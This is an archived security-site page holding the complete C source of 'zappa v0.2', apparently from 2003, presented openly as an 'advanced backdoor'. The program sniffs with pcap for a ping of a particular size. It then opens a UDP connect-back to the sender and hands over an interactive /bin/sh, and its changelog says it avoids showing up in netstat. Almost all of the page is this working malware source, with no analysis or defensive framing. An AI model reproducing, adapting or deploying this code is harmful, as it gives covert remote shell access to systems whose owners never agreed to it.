Twenty Year Anniversary

zappa-0.2.c

zappa-0.2.c
Posted Jul 28, 2003
Authored by sac, Soeren Bleikertz | Site sac.cc

A backdoor which waits for an ICMP packet and then connects with a UDP server on the client. v0.2

tags | udp
MD5 | 7d335f30c5dcd14298a51d1bf42ea522

zappa-0.2.c

Change Mirror Download
/***************************************************************************
* zappa v0.2 - advanced backdoor
* by Soeren Bleikertz, sb@osdev.de - http://www.sac.cc
*
* Description:
* 'zappa' is an advanced backdoor, which doesn't listen on a TCP-port for
* clients. It waits for a special ICMP-packet and then it 'connects' back
* to an UDP-server on the 'client'.
*
* ChangeLog
* - Replaced ICMP-Rawsock with pcap-stuff -> process not listed by netstat
*
****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <time.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <getopt.h>
#include <pcap.h>
#include <netinet/if_ether.h>

//CONFIG
#define PORT 2323 //53 would be a nice value
#define PKT_SIZE 100 // ping -s <PKT_SIZE>
#define SHELL "/bin/sh"
#define TIMEOUT 20 //seconds
#define BUFF_SIZE 8192 //bytes
//EOC

#define BAN_WELCOME "evil backd00r - Have a lot of fun..\n" //change this :>
#define BAN_BYE "Have a nice day..\n"

//globals
int verbose, silent;
char *pcap_dev;
pcap_t *pcap_desc;

//SIGCHLD-handler
void sig_chld(int signo)
{
pid_t pid;
int s;
while ((pid = waitpid(-1, &s, WNOHANG)) > 0)
return;
}

//UDP-based and passive backdoor
int backdoor(struct in_addr *src)
{
struct sockaddr_in cli;
//fd: child--write-->parent, //fd2: parent--write-->child
int sock, sock_b, pipe_b, fd[2], fd2[2], highfd;
char buffer[BUFF_SIZE];
socklen_t len;
pid_t pid;
fd_set readfds;
struct timeval tout; //timeout

if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
if (!silent)
perror("[!] socket() failed");

return -1;
}

cli.sin_addr.s_addr = src->s_addr;
cli.sin_port = htons(PORT);
cli.sin_family = AF_INET;
len = sizeof(cli);

FD_ZERO(&readfds);

sendto(sock, BAN_WELCOME, sizeof(BAN_WELCOME), 0,
(struct sockaddr*)&cli, len);
if (!silent)
printf("[+] send banner\n");

if ((pipe(fd) == -1) || (pipe(fd2) == -1)) {
if (!silent)
perror("[!] pipe() failed");
return -1;
}
//child
if ((pid=fork()) == 0) {
close(fd[0]); //close read-pipe
close(fd2[1]); //close write-pipe
//redirect I/O
dup2(fd2[0], 0);
dup2(fd[1], 1);
dup2(fd[1], 2);
execl(SHELL, SHELL, NULL); //start shell
close(fd[1]);
close(fd2[0]);
exit(0);
}
//parent
else if (pid > 0) {
close(fd[1]); //close write-pipe
close(fd2[0]); //close read-pipe

fcntl(sock, F_SETFL, O_NONBLOCK);
fcntl(fd[0], F_SETFL, O_NONBLOCK);

highfd = (sock > fd[0]) ?sock :fd[0];

if (!silent)
printf("[+] select()..\n");

while(1) {
FD_SET(sock,&readfds);
FD_SET(fd[0],&readfds);

bzero(buffer, sizeof(buffer));

tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;

select(highfd+1, &readfds,NULL,NULL,&tout);

sock_b = recvfrom(sock, buffer, sizeof(buffer), 0,
(struct sockaddr*)&cli, &len);
pipe_b = read(fd[0], buffer, sizeof(buffer));

if (sock_b > 0) {
//verify src-addr
if (src->s_addr != cli.sin_addr.s_addr)
continue;
write(fd2[1], buffer, sock_b);
}

if (pipe_b > 0) {
buffer[pipe_b] = 0;
sendto(sock, buffer, pipe_b, 0,
(struct sockaddr*)&cli, len);
}

if ((!pipe_b) || (!sock_b))
break;
}
close(fd[0]); //close pipe
close(fd2[1]); //close pipe
sendto(sock, BAN_BYE, sizeof(BAN_BYE), 0,
(struct sockaddr*)&cli, len);
close(sock); //close socket
}
else {
if (!silent)
perror("[!] fork() failed");
return -1;
}

return 0;
}

void usage(void)
{
printf("usage: zappa [opt]\n"
"\t-v\tverbose mode\n"
"\t-s\tsilent mode\n"
"\t-i <dev>\tdevice for pcap\n\n");
exit(0);
}

//mostly from stevens
int pcap_init(void)
{
int snaplen = PKT_SIZE+sizeof(struct ether_header)+sizeof(struct iphdr)+sizeof(struct icmphdr)+1;
//struct bpf_program filter;
char err_buf[PCAP_ERRBUF_SIZE];
uint32_t localnet, netmask;

if (pcap_dev == NULL)
if ((pcap_dev = pcap_lookupdev(err_buf)) == NULL)
if (!silent) {
printf("[!] pcap_lookupdev() failed: %s\n", err_buf);
return -1;
}
if (!silent)
printf("[+] using dev: %s\n", pcap_dev);

if (((pcap_desc = pcap_open_live(pcap_dev, snaplen, 0, 500, err_buf)) == NULL)
&& (!silent)){
printf("[!] pcap_open_live() failed: %s\n", err_buf);
return -1;
}

if ((pcap_lookupnet(pcap_dev, &localnet, &netmask, err_buf) <0) && (!silent)) {
printf("[!] pcap_lookupnet() failed: %s\n", err_buf);
return -1;
}

return 0;
}

void icmp_watch(void)
{
char *ptr;
struct pcap_pkthdr hdr;
int len;
struct ether_header *eptr;
struct ip *iphdr;
struct icmphdr *icmph;

while(1) {
while((ptr = (char*) pcap_next(pcap_desc, &hdr)) == NULL);

len = hdr.caplen;

eptr = (struct ether_header*) ptr;
if (ntohs(eptr->ether_type) != ETHERTYPE_IP)
continue;

iphdr = (struct ip*)(ptr+14);
icmph = (struct icmphdr*)(ptr+14+sizeof(struct ip));

if ((len == (PKT_SIZE+sizeof(struct ether_header)+sizeof(struct iphdr)+
sizeof(struct icmphdr))) &&
(iphdr->ip_v == 4) && (iphdr->ip_p == IPPROTO_ICMP)
&& (icmph->type == ICMP_ECHO)
) {
if (!silent)
printf("[+] starting backdoor..\n");
backdoor(&(iphdr->ip_src));
if (!silent)
printf("[+] backdoor closed\n");
}
}

}

int main (int argc, char **argv)
{
int foo;

// init sig-handler for childs
signal(SIGCHLD,sig_chld);

while ((foo = getopt(argc, argv, "i:vs")) != -1) {
switch(foo) {
case 's': silent++; break;
case 'v': verbose++; break;
case 'i': pcap_dev = optarg; break;
case '?': printf("[!] unknown option\n");
usage(); break;
}
}

if (!silent)
printf("[+] zappa backdoor by soeren, sac.cc\n");

if (pcap_init() == -1) {
printf("[!] pcap_init failed\n");
return -1;
}

icmp_watch();

return 0;
}
//EOF

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    5 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close